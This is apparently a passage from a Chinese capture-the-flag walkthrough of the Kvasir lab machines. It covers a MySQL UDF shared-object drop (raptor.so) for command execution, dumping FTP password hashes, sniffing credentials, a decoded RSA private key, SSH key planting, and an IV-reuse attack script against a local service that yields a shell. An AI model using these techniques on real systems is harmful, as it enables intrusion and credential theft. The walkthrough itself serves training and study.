e000000f6ffff6f0200000000000000600200000000000060020000000000002800000000000000030000000000000008000000000000000000000000000000380000000b000000020000000000000088020000000000008802000000000000c00000000000000004000000010000000800000000000000180000000000000040000000030000000200000000000000480300000000000048030000000000008f0000000000000000000000000000000100000000000000000000000000000048000000ffffff6f0200000000000000d803000000000000d803000000000000100000000000000003000000000000000200000000000000020000000000000055000000feffff6f0200000000000000e803000000000000e80300000000000020000000000000000400000001000000080000000000000000000000000000006400000004000000020000000000000008040000000000000804000000000000a8000000000000000300000000000000080000000000000018000000000000006e000000040000004200000000000000b004000000000000b004000000000000180000000000000003000000140000000800000000000000180000000000000078000000010000000600000000000000001000000000000000100000000000001700000000000000000000000000000004000000000000000000000000000000730000000100000006000000000000002010000000000000201000000000000020000000000000000000000000000000100000000000000010000000000000007e000000010000000600000000000000401000000000000040100000000000000800000000000000000000000000000008000000000000000800000000000000870000000100000006000000000000005010000000000000501000000000000010010000000000000000000000000000100000000000000000000000000000008d00000001000000060000000000000060110000000000006011000000000000090000000000000000000000000000000400000000000000000000000000000093000000010000000200000000000000002000000000000000200000000000002c00000000000000000000000000000004000000000000000000000000000000a1000000010000000200000000000000302000000000000030200000000000009c00000000000000000000000000000008000000000000000000000000000000ab0000000e0000000300000000000000003e000000000000002e0000000000000800000000000000000000000000000008000000000000000800000000000000b70000000f0000000300000000000000083e000000000000082e0000000000000800000000000000000000000000000008000000000000000800000000000000c3000000060000000300000000000000103e000000000000102e000000000000d00100000000000004000000000000000800000000000000100000000000000082000000010000000300000000000000e03f000000000000e02f0000000000002000000000000000000000000000000008000000000000000800000000000000cc000000010000000300000000000000004000000000000000300000000000002000000000000000000000000000000008000000000000000800000000000000d5000000010000000300000000000000204000000000000020300000000000000800000000000000000000000000000008000000000000000000000000000000db000000080000000300000000000000284000000000000028300000000000000800000000000000000000000000000001000000000000000000000000000000e0000000010000003000000000000000000000000000000028300000000000001c00000000000000000000000000000001000000000000000100000000000000e9000000010000000000000000000000000000000000000044300000000000003000000000000000000000000000000001000000000000000000000000000000f8000000010000000000000000000000000000000000000074300000000000009b040000000000000000000000000000010000000000000000000000000000000401000001000000000000000000000000000000000000000f350000000000002c010000000000000000000000000000010000000000000000000000000000001201000001000000000000000000000000000000000000003b360000000000002a010000000000000000000000000000010000000000000000000000000000001e010000010000003000000000000000000000000000000065370000000000000e03000000000000000000000000000001000000000000000100000000000000010000000200000000000000000000000000000000000000783a00000000000028050000000000001e0000003000000008000000000000001800000000000000090000000300000000000000000000000000000000000000a03f000000000000880100000000000000000000000000000100000000000000000000000000000011000000030000000000000000000000000000000000000028410000000000002901000000000000000000000000000001000000000000000000000000000000

使用以下命令将其保存到目标服务器的磁盘上

SELECT x'上面编码' INTO DUMPFILE '/usr/lib/mysql/plugin/raptor.so'

然后我用新创建的库创建了一个新函数

MySQL [(none)]> create function do_cmd returns integer soname "raptor.so";
Query OK, 0 rows affected (0.002 sec)

好像执行成功

现在我们端口转发22端口出来

重置root登录密码

好，已经登录成功了

找到了一个flag，看来不是这个

查看本地开放的端口，就是pure-ftp有可疑，毕竟只有21端口咱们没有使用到

找到了FTP的密码

root@db:~# cat /etc/pure-ftpd/pureftpd.passwd 
celes:$1$LwZNkFH0$8rq4AbiYLXkfSMPXB1psV/:1000:1000::/var/log/./::::::::::::

咱们根目录有一个叫.words.txt文件，可能是密码表，使用john进行爆破，还是找不到密码

其实有个问题很奇怪的，正常来说，一个靶机就只有一张网卡，但是这个靶机就不同，有两张网卡，而且是不同的网段

于是，我抓一下eth1网卡的流量，看到有人登录ftp

以十六进制的方式查看，找到了ftp账号和密码，他们使用的用户名celes和密码登录im22BF4HXn01

ssh登录上去

可以看到这是ftp连接脚本

在操作历史记录里面找到一个可疑操作，这是一个python图片隐写术的库

celes@dev1:~$ cat .bash_history 
stepic --help

也就是说，图片是关键，我们找到图片kvasir.png，使用xxd导出图片

还原图片

      root@kali:/tmp# cat k.hex | xxd -r -p  k.jpg

一张很诡异的外星人图片，虽然是打不开

使用stepic，我们可以从图像中检索一些隐藏的数据k.png。 (pip3 install stepic，pip不可以)， 这样就找到了一串十六进制的字符串

root@kali:/tmp# stepic -i k.jpg -d
89504e470d0a1a0a0000000d494844520000012200000122010300000067704df500000006504c5445ffffff00000055c2d37e00000104494441540899ed98c90dc32010459152804b72eb2ec9054422304bc089655f180ec9fb0730f07cfa9a0552420821f43fcaa6674aeb5e96dbe23b1b5434a58be559bf1e59befa03a848aa5ab22de690f2d530a8895473086a365500e7a1265132b5b3bbfc05358e7a57640b919bba0d358eeab55c9c418da7cc0df1a576a2792fa561ad035434a5920b808588d974e215d4584acff4065626ffe9db47a8e194eec805a00d7621830aa6acffd40c95d5a6fa27d404cae555e13475410550e6cca113ed72145424a56ee8ab4f8989ecb5196a02d5bdfa2477e83333410553d97ba093cc04154c89a439ba880ea881944c2d3aea0a6a0e75acc8528c4550e1144208a15fd70b88df9bb4ae0a3dc20000000049454e44ae426082

接着生成文件

echo 89504e470d0a1a0a0000000d494844520000012200000122010300000067704df500000006504c5445ffffff00000055c2d37e00000104494441540899ed98c90dc32010459152804b72eb2ec9054422304bc089655f180ec9fb0730f07cfa9a0552420821f43fcaa6674aeb5e96dbe23b1b5434a58be559bf1e59befa03a848aa5ab22de690f2d530a8895473086a365500e7a1265132b5b3bbfc05358e7a57640b919bba0d358eeab55c9c418da7cc0df1a576a2792fa561ad035434a5920b808588d974e215d4584acff4065626ffe9db47a8e194eec805a00d7621830aa6acffd40c95d5a6fa27d404cae555e13475410550e6cca113ed72145424a56ee8ab4f8989ecb5196a02d5bdfa2477e83333410553d97ba093cc04154c89a439ba880ea881944c2d3aea0a6a0e75acc8528c4550e1144208a15fd70b88df9bb4ae0a3dc20000000049454e44ae426082 | xxd -r -p > kvasir.png

因此，我们还有另一个图像文件。在默认查看器中打开会kali导致错误，拖到windows环境下就可以看到图片

解析二维码的内容，

Nk9yY31hva8q

登录时celes，我们收到邮件通知，我们去查看一下有什么邮件

在db主机那里找了terra的服务器，IP是192.168.3.50

找了个扫描器的脚本，查看这台服务器开放了那个端口

#!/usr/bin/env python
from socket import *

if __name__ == '__main__':
    target = raw_input('Enter host to scan: ')
    targetIP = gethostbyname(target)
    print 'Starting scan on host ', targetIP

    #scan reserved ports
    for i in range(0, 65535):
        s = socket(AF_INET, SOCK_STREAM)

        result = s.connect_ex((targetIP, i))

        if(result == 0) :
            print 'Port %d: OPEN' % (i,)
        s.close()

开放了22，4444端口

使用上面的密码登录ssh，发现密码错误

nc查看一下4444端口

回想起来，我记得我们在目标上找到了一个词表192.168.2.200。略过列表.words.txt，我注意到上面列表中的一项匹配。snaaa是的字谜sanaa。同样obner是的字谜borne。

EXP脚本

from socket import socket

def isAnagram(str1, str2):
    str1_list = list(str1)
    str1_list.sort()
    str2_list = list(str2)
    str2_list.sort()

    return (str1_list == str2_list)

words = list(open('.words.txt', 'r'))
for index,word in enumerate(words):
        words[index] = word.strip()

sock = socket()
sock.connect(('192.168.3.50', 4444))

data = True
while data:
        data = sock.recv(4096)
        if 'Solve:' in data:
                question = data.split('Solve:')[1].strip()
                answer = ''
                for word in words:
                        if isAnagram(question, word):
                                answer = word
                print "'%s' = '%s'"%(question, answer)
                sock.send("%s\n"%answer)
        else:
                print data

执行之后结果显示如下，

root@db:~# python exp.py 
'vnetaimidnoe' = 'nonmediative'
'ikrgmiia' = 'kirigami'
'enosrssids' = 'drossiness'
'doarnbdiar' = 'drainboard'
'yhsdediuct' = 'thucydides'
'ereoipn' = 'pereion'
'porcgahogil' = 'logographic'
'ihavcn' = 'chavin'
'tk1m0gi' = 'g0tmi1k'
'ansaa' = 'sanaa'
'tovedde' = 'devoted'
'fepirsacluyil' = 'superficially'
'riunsoaclmti' = 'matriclinous'
'suhtca' = 'cushat'
'tdovede' = 'devoted'
'mpsinace' = 'spanemic'
'ufcmmorliu' = 'cumuliform'
'fdrirte' = 'drifter'
'yilotnifnac' = 'nonfacility'
'thkc3e' = 'teh3ck'
'aredm' = 'dream'
'dyur' = 'rudy'
'mpeouinkrsja' = 'superkojiman'
'hseoinmrss' = 'romishness'
'tupndudee' = 'undeputed'
'sgsprruocyhye' = 'psychosurgery'
'ibyfoiitlrpta' = 'profitability'
'bngidreud' = 'brundidge'
'rdrtife' = 'drifter'
'ortiaamenc' = 'aeromantic'
'uynnd' = 'dunny'
'otnaecirma' = 'aeromantic'
'lrciliergvan' = 'invercargill'
'ebeelli' = 'libelee'
'cntungenii' = 'unenticing'
'eureresccd' = 'recrudesce'
'resrabba' = 'barrebas'
'danmniiveeot' = 'nonmediative'
'rotcheir' = 'torchier'
'ealrguba' = 'arguable'
'midihlerk' = 'kriemhild'
'vtoeded' = 'devoted'
'eluiapyrficls' = 'superficially'
'luiironatsmc' = 'matriclinous'
'3ktehc' = 'teh3ck'
'aplnaterenpa' = 'lappeenranta'
'iuthddeysc' = 'thucydides'
'dctrteoihce' = 'ricochetted'
'sasstiida' = 'diastasis'
'ohcrigalgpo' = 'logographic'
'tssecremie' = 'semisecret'
'riaibypltoitf' = 'profitability'
'icgtnnneui' = 'unenticing'
'onrmgelrsei' = 'mongreliser'
'zstueh' = 'zethus'
'mrnimotcdeio' = 'monodimetric'
'rteearcu' = 'creature'
'vatliqecuoiinarof' = 'overqualification'
'evaitdari' = 'radiative'
'perunreces' = 'precensure'

Score: 120
Time: 0.04 secs
You're a winner
LS0tLS1CRUdJTiBSU0EgUFJJVkFURSBLRVktLS0tLQpQc**jLVR5cGU6IDQsRU5DUllQVEVECkRFSy1JbmZvOiBBRVMtMTI4LUNCQyw3Njg0MTgyMkFCOUU3NzJGRDFENjUzRjYxNzlGMEU0RAoKT3JFTTJvY25oSEtnNW51SDdwczFDb09KQ2loYXNtRkpLTE9WTk5ZRk9oR0tVb2pQWUV0YTV5T2hJc2tmMGgwcgpTbyt4VkRLNjdHM0RsZ3ltVVYzRHhHZml6TGZadmh4UVJDOFF5MG1mNE4rbWlZa3ZmMk5hRnRhdHBOY2pLNXBNClV5NlFTRk1PQzhhS3BlMEZMNlVHRFJKUTVHU0c0RGxKckxVSkJNdm5TTHRZWkhsYVdBSUNLYlhmcFhWNFNUd3YKSjBEOGg5UnRsUkpoTENLNWVLZ3VwWUNRSWlHUVdnM1B2WnBYazlra2pYaG1PUXdVWW9DUmwzbDRqNXpsbkZjVApQNlU5VVBoUnEvQ2s0UXJrMmRHeEZmcHBRZDl4VytiNFBXamlTQ2lrTEYzUTBoZk5OdkVidTRvdW5BZ1l3UEZICmpPWEhKcXhWb2cvcFp6OVk4WGZTUDNoejlBWUhXZkkyaUM5Q25rN2JvUmNPdittY2dFZVdXa1lyVnNjT2l2WWoKOU4yeGlOcDRHSCtOSUc4bW0vTGRsN2pRTWwvVnJyNWN4M2ZYak9lem1nc1NrQVk0Q2NzcHdLc1NYSzhHTC9iTwpoVDZwS1dmTDZVSTh3VWdwSTdLaGdLK0FPS3VTL1hQWVRTZHorMFJKeE5GU0xPRk5jalJ0TCtOVzBValBxNUpoCkRpYStwdzVxQitsbGx4Z2FOMFdCUXNrSUZRcHBwUG93d2pHOEpnOGpKQmpTWWozcjRMSXJad0pTcGN2b0JpVUEKb0NxblFVTXRYbE1oOS9DdkJCR3MxK0pWY2prSW5CZGU5NDVWK2VqaFA2R1BZanU0VFFWN0I3MGQ3YUVXME9FbQowZDduck9XL0xDWXBzVi9ONXJxVnNHbFR2d2pKT**3eU1xRVo5RTA5Z3VNNWVMNENFUFBtcDlaRGV5MmZCQUd3CnE3blNyOHE2SHNmNGQrWVBSKzkwRWZNSlJlcUkzczFGUW9UdngrUGFGUGlLdzdkZkhGQ2dMc2NYY1hjb2duTHoKY0IwbG5lbUkrY0ZtZlk3NEYxZVlMM2Z3Skl3U1JnSzg1WGMyTXk4c3FKejFpemo2SWxPMmtRMWpMa3JoSk9aOApYK3AvOXc1ekEweDJmYmpwcEhhYytZb0pmeVB5WVhqa3BpZ0RQakhYaFJpdDJxblVySGZEYzBGamg1QUtOVTJLCk1VL3l3WEdFZzZ3MENwcEs5SkJvMHUveEpsaFQvak9XTmlNNFlaalhsaFF6a3h5ZWJ2YnlSUzZTbGhsbzE0MmwKZ011TVV2UG4xZkFlbmlyNkFGd3kycmxrdFE1L2E4ejJWQ3dQa05BNDBNSW1TSE1XUlNGY**Eak01endyMjRH***OMHBJMUJDbUNzZjBtc3ZFd0xoZGNWbmhKWTdCZzRpem01YlgrQXJWL3ltTE9reWJLOGNoejVmcnlYY2plVjFxCml6SmUyQVhaazEvOGhZODB0dkpXanhVRWZuZ3V5b296UWY1VDc0bW41YWV6OUpnR1dNcXpwZkt3WjZMeDVjVGcKWnUrbStyeWFrQlBGalV0dDA0bENZQ0NLV1F6UGhnSXI1eFVGeDYyaENHaGg2Vzh0U0lCNms3SHB1bjEyM0dRMAp1VCtSMEVyWUE1R2R5eDQ0RlpFYXRaM3JYQ3BWbUpsbENUV1VxQnVhSFlBdGNaVGhUVFpmeFJGSHkwMklUNkZXClBMQ1ovWE4yRStUZHRrWG1GY1RYUnNndHlBLzVWWHNUV1dtUmNIY3p2NWc1WWNRM3BIczNNaFN4c1dTZFR6LzgKUll6bXhPbkNqWldYYVVlMFhiN0ZqQS9ldm1wWHN5aENoR2J2cDBLMGhaRmNNZXN6RkthOEs0cEFlZGN5RzMxbgo0K0hoSW1uRXBMWlFPWGhmWGxrS01RWHJCeXM3aGtvbmtEcDU3VnFoK0lJWkxHelZtZlRWRWoyV2hjLzBZK0dJCkRNcGgwWnZURytKZ3YxTE8zU2w4MlJ6bTFqVWt6RUlaTkl4WWVTR3JaZjZDaFZMUGE4NWF4cXc1RVZOQ3hZVWcKSkFxZyt1ZDZ4SU85b2JpZHh6STJyTGZieGNwTXVyODBuYjRjcllNTm0wOXlQUWFza25nSy80SWptblBMZVRpaAotLS0tLUVORCBSU0EgUFJJVkFURSBLRVktLS0tLQo=

上面这段是base64加密，我们解密一下，对此进行解码会得到一个rsa私钥。

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,76841822AB9E772FD1D653F6179F0E4D

OrEM2ocnhHKg5nuH7ps1CoOJCihasmFJKLOVNNYFOhGKUojPYEta5yOhIskf0h0r
So+xVDK67G3DlgymUV3DxGfizLfZvhxQRC8Qy0mf4N+miYkvf2NaFtatpNcjK5pM
Uy6QSFMOC8aKpe0FL6UGDRJQ5GSG4DlJrLUJBMvnSLtYZHlaWAICKbXfpXV4STwv
J0D8h9RtlRJhLCK5eKgupYCQIiGQWg3PvZpXk9kkjXhmOQwUYoCRl3l4j5zlnFcT
P6U9UPhRq/Ck4Qrk2dGxFfppQd9xW+b4PWjiSCikLF3Q0hfNNvEbu4ounAgYwPFH
jOXHJqxVog/pZz9Y8XfSP3hz9AYHWfI2iC9Cnk7boRcOv+mcgEeWWkYrVscOivYj
9N2xiNp4GH+NIG8mm/Ldl7jQMl/Vrr5cx3fXjOezmgsSkAY4CcspwKsSXK8GL/bO
hT6pKWfL6UI8wUgpI7KhgK+AOKuS/XPYTSdz+0RJxNFSLOFNcjRtL+NW0UjPq5Jh
Dia+pw5qB+lllxgaN0WBQskIFQpppPowwjG8Jg8jJBjSYj3r4LIrZwJSpcvoBiUA
oCqnQUMtXlMh9/CvBBGs1+JVcjkInBde945V+ejhP6GPYju4TQV7B70d7aEW0OEm
0d7nrOW/LCYpsV/N5rqVsGlTvwjJNowyMqEZ9E09guM5eL4CEPPmp9ZDey2fBAGw
q7nSr8q6Hsf4d+YPR+90EfMJReqI3s1FQoTvx+PaFPiKw7dfHFCgLscXcXcognLz
cB0lnemI+cFmfY74F1eYL3fwJIwSRgK85Xc2My8sqJz1izj6IlO2kQ1jLkrhJOZ8
X+p/9w5zA0x2fbjppHac+YoJfyPyYXjkpigDPjHXhRit2qnUrHfDc0Fjh5AKNU2K
MU/ywXGEg6w0CppK9JBo0u/xJlhT/jOWNiM4YZjXlhQzkxyebvbyRS6Slhlo142l
gMuMUvPn1fAenir6AFwy2rlktQ5/a8z2VCwPkNA40MImSHMWRSFboDjM5zwr24Gk
N0pI1BCmCsf0msvEwLhdcVnhJY7Bg4izm5bX+ArV/ymLOkybK8chz5fryXcjeV1q
izJe2AXZk1/8hY80tvJWjxUEfnguyoozQf5T74mn5aez9JgGWMqzpfKwZ6Lx5cTg
Zu+m+ryakBPFjUtt04lCYCCKWQzPhgIr5xUFx62hCGhh6W8tSIB6k7Hpun123GQ0
uT+R0ErYA5Gdyx44FZEatZ3rXCpVmJllCTWUqBuaHYAtcZThTTZfxRFHy02IT6FW
PLCZ/XN2E+TdtkXmFcTXRsgtyA/5VXsTWWmRcHczv5g5YcQ3pHs3MhSxsWSdTz/8
RYzmxOnCjZWXaUe0Xb7FjA/evmpXsyhChGbvp0K0hZFcMeszFKa8K4pAedcyG31n
4+HhImnEpLZQOXhfXlkKMQXrBys7hkonkDp57Vqh+IIZLGzVmfTVEj2Whc/0Y+GI
DMph0ZvTG+Jgv1LO3Sl82Rzm1jUkzEIZNIxYeSGrZf6ChVLPa85axqw5EVNCxYUg
JAqg+ud6xIO9obidxzI2rLfbxcpMur80nb4crYMNm09yPQaskngK/4IjmnPLeTih
-----END RSA PRIVATE KEY-----

我将密钥放入文件中并保存chmod到600。然后我尝试用它来ssh作为terra来192.168.3.50。系统提示您输入密钥的密码，因为它已加密，因此我使用了之前找到的字符串- Nk9yY31hva8q。

查看一下目录，我们找到开放4444端口的脚本

登录后，我们收到了一封邮件通知。让我们看看那封邮件是什么。

按照邮件提示Locke存在端口敲门服务,IP是192.168.4.100，既然没有提示我们要敲击那个端口，我查了一下资料，原来有默认端口

开启了1111端口

原来这个1111端口就是一个shell

按照提示image是个关键

使用证书登录shell

mkdir .ssh
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ6RfCFyxxJLNPe/Dn94vaHUFvnm8Qg44CRCkhBD+V2fJPpi3DR0Bo3vUmJ2N+iPO91plE2tFjnCR0dSva33dMnHy8oNn6fm6nicIqV7enazPaEo8OE/su/GRVMzsijeqgBhd5+CBM5a9+grxfylcTfEB0jIXi4JeYON6DpQqgKvleJY/XZhAQ4Mt362n1EfhH+sJp6dyw2y1rjmxjU1e1a4mN7gdWQ9Xx6LThx7xI/k/BWFWx+nYfGvyDggqftlPC2aQPVK6+ZmjIMc0CxOioW3ZGJUT3ItCP3gZxqDHs+pSKN4dv7hP7q24Nm2OBy3hF1hl6OdQ5jH6IeJKOXrEJ terra@dev2' > .ssh/authorized_keys

登录成功后，将这个文件提取出来

提取到本地kali，解压打开

它是一个磁盘，里面有个压缩包，解压不了，需要密码

我们爆破不了密码

dd：用指定大小的块拷贝一个文件，并在拷贝的同时进行指定的转换

root@kali:/tmp# dd if=diskimage of=test.wav bs=1 skip=263168 count=405152
405152+0 records in
405152+0 records out
405152 bytes (405 kB, 396 KiB) copied, 1.36633 s, 297 kB/s

下载到本地之后，发现没有wav这个音频，可能xxd下来有些问题，只能靶机生成wav再用xxd下载到本地

声音超级难听=-=

使用audacity查看音频，发现有一串字符串，OrcWQi5VhfCo

使用这个密码解压压缩包，得到了一个密码

切换到kefka用户

我们看看该用户有没有特权命令

让我们来运行一下，没有什么回应

退出的时候，发现这个脚本用sock接受东西

我们监听一下端口，可以看出程序已经开放了1234端口

nc连接到1234端口

很快我们可以观察到以下几点：

• 加密的文本总是不同的

• 每次使用不同的键（因此如上所述）

• 输出字符串是编码字符串的十六进制表示

• 用过的钥匙很小

另外，脚本的名称建议使用WEP加密……或者至少与WEP一样糟糕：）

经过一些研究，我们可以使用密钥重用来进行攻击。关于它如何工作的几句话。

由于XOR的工作方式，如果重用同一密钥，则某些弱密码很容易受到密钥重用攻击。只要您知道一条加密消息的纯文本及其密钥，如果您发现另一条用相同密钥编码的未知消息，就可以提取其纯文本。让我们看以下内容：

encrypted_messageA= messageAXORkey

encrypted_messageB= messageBXORkey

如果我们将两者都异或会发生什么？请记住abc XOR abc = 0！

encrypted_messageA XOR encrypted_messageB = messageA XOR key XOR messageB XOR key = messageA XOR messageB

key消失了，因为key XOR key = 0。

现在假设我们知道的明文messageA并且想要找到messageB。我们需要做的就是messageA通过将整个事物与进行XOR运算来摆脱方程式的已知messageA。

messageA XOR messageB XOR messageA = messageB

再次，因为messageA XOR messageA = 0。

因此，知道需要做什么之后，我精心设计了以下脚本来快速获取我们的纯文本标志。

#!/usr/bin/python

import socket

# XOR strings function definition (ensure to pass in binary values)
#
def xor_strings(p_string1, p_string2):
    return "".join(chr(ord(x) ^ ord(y)) for x, y in zip(p_string1, p_string2))

# Initialise socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 1234))

# Get banner and instructions
sock.recv(200)

# Random, known message of the same length as the flag
# to be used later for XOR operations
message = "A" * 12

# Collections of encrypted flags and messages
flags = {}
messages = {}

while True:
    # Build a list of known encrypted flags
    sock.send("V\n")
    encrypted_flag = sock.recv(200).strip()
    flag_key = encrypted_flag[:6]
    flag_value = encrypted_flag[7:]
    flags[flag_key] = flag_value

    # Build a list of known encrypted messages
    sock.send("E " + message + "\n")
    encrypted_message = sock.recv(200).strip()
    message_key = encrypted_message[:6]
    message_value = encrypted_message[7:]
    messages[message_key] = message_value

    # Find the flag key in message keys or vice versa
    # (since we're building 2 lists, check both - should
    # be able to find a match quicker)
    if flag_key in messages:
        message_value = messages[flag_key]
        break

    if message_key in flags:
        flag_value = flags[message_key]
        break

# Values are returned in hex form, so need to convert it back
# to binary for XOR
binary_message = message_value.decode("hex")
binary_flag = flag_value.decode("hex")

# XOR both encryptions together
# encrypted_message XOR encrypted_flag = message XOR key XOR flag XOR key
xor_both_result = xor_strings(binary_message, binary_flag)

# XOR above rsult with plaintext message to get the flag, because:
# key XOR key = 0; and
# message XOR message = 0; therefore:
# message XOR key XOR flag XOR key XOR message = flag
decoded_flag = xor_strings(xor_both_result, message)

print decoded_flag

sock.close()

使用脚本之后获取到密码

kefka@adm:/tmp$ sudo /opt/wep2.py &
[3] 2326
kefka@adm:/tmp$ python run.py 
0W6U6vwG4W1V
kefka@adm:/tmp$ 

我们需要一个root shell！我尝试将其用作root密码，但是没有用。尝试了其他一些事情，试图找到其他特权升级点，但是没有运气。

过了一会儿，我决定考虑我们接受输入的其他内容。我决定在先前攻击的应用程序中传递字符串/opt/wep2.py。

进去之后就是一个python客户端

wep2.py

cat wep2.py
#!/usr/bin/env python

import socket, thread, random, subprocess, os
from Crypto.Cipher import AES
from encodings import hex_codec

iv_size = 6
key = os.urandom(16)

def reset_key(sock):
	key = os.urandom(16)

def gen_iv():
	iv_nibbles = os.urandom(iv_size).encode("hex")[0:iv_size]
	iv_total = iv_nibbles+"1"*(32-len(iv_nibbles))
	return iv_total.decode("hex")

def encrypt(iv, data):
	pad_bytes = 16-(len(data) % 16)

	if pad_bytes < 16 and pad_bytes > 0:
		data = data + "X"*pad_bytes

	aes = AES.new(key, AES.MODE_OFB, iv)
	ciphertext = aes.encrypt(data)
	if pad_bytes < 16:
		ciphertext = ciphertext[0:-pad_bytes]

	return ciphertext

def banner(sock):
	sock.send("=============================\nCan you retrieve my secret..?\n=============================\n\nUsage:\n'V' to view the encrypted flag\n'E' to encrypt a plaintext string (e.g. 'E AAAA')\n\n")

def handler(sock, addr):

	reset_key(sock)
	banner(sock)

	f = sock.makefile()
	cmd = f.readline()

	while len(cmd) != 0:
		cmd = cmd.strip()
		if len(cmd) == 0:
			sock.send("Need a Command...\n")
			break
		iv = gen_iv()

		if cmd[0] == "V":
			ciphertext = encrypt(iv, "0W6U6vwG4W1V")
			sock.send(iv.encode("hex")[0:iv_size] + ":" + ciphertext.encode("hex") + "\n")
			reset_key(sock)
			cmd = f.readline()
			continue

		elif cmd[0] == "E":
			segs = cmd.split()
			if len(segs) != 2 or len(segs[1]) < 1:
				sock.send("Invalid Syntax\n")

			else:
				ciphertext = encrypt(iv, segs[1])
				sock.send(iv.encode("hex")[0:iv_size] + ":" + ciphertext.encode("hex") + "\n")

			cmd = f.readline()
			continue

		elif cmd == "0W6U6vwG4W1V":
			while True:
				sock.send("> ")
				cmd2 = sock.recv(256)
				p = subprocess.Popen(['/usr/bin/python', '-c', cmd2], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
				p1 = p.communicate()[0]
				sock.send(p1)
			done

			cmd = f.readline()
			continue

		else:
			sock.send("Invalid Command\n")
			break

	f.close()
	sock.close()

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)

s.bind(("127.0.0.1", 1234))
s.listen(1)

sock, addr = s.accept()
handler(sock, addr)

找到了flag，不过字符串倒转了

最后flag